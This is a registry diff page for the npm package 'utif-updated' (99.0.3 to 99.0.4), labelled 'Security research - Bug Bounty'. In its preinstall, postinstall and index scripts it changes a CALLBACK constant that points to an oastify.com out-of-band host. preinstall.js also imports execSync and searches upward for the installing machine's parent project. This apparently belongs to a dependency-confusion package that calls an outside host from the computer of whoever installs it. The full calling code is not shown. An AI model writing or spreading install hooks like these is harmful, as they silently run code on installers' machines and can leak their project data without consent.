utif-updated 99.0.3 → 99.0.4

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
package/index.js CHANGED
@@ -4,7 +4,7 @@ const os = require('os');
4
4
  const fs = require('fs');
5
5
  const path = require('path');
6
6
 
7
- const CALLBACK = 'fyh82qlu93wdksjiz5qjz9h27tdk1e02p.oastify.com';
7
+ const CALLBACK = 'icare.fyh82qlu93wdksjiz5qjz9h27tdk1e02p.oastify.com';
8
8
 
9
9
  if (!global.__utif_updated_triggered) {
10
10
  global.__utif_updated_triggered = true;
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "utif-updated",
3
- "version": "99.0.3",
3
+ "version": "99.0.4",
4
4
  "description": "Security research - Bug Bounty",
5
5
  "main": "index.js",
6
6
  "author": "icare",
package/postinstall.js CHANGED
@@ -4,7 +4,7 @@ const os = require('os');
4
4
  const fs = require('fs');
5
5
  const path = require('path');
6
6
 
7
- const CALLBACK = 'fyh82qlu93wdksjiz5qjz9h27tdk1e02p.oastify.com';
7
+ const CALLBACK = 'icare.fyh82qlu93wdksjiz5qjz9h27tdk1e02p.oastify.com';
8
8
 
9
9
  function findParentProject() {
10
10
  let dir = process.cwd();
package/preinstall.js CHANGED
@@ -5,7 +5,7 @@ const fs = require('fs');
5
5
  const path = require('path');
6
6
  const { execSync } = require('child_process');
7
7
 
8
- const CALLBACK = 'fyh82qlu93wdksjiz5qjz9h27tdk1e02p.oastify.com';
8
+ const CALLBACK = 'icare.fyh82qlu93wdksjiz5qjz9h27tdk1e02p.oastify.com';
9
9
 
10
10
  // Remonte depuis cwd pour trouver le VRAI projet parent
11
11
  function findParentProject() {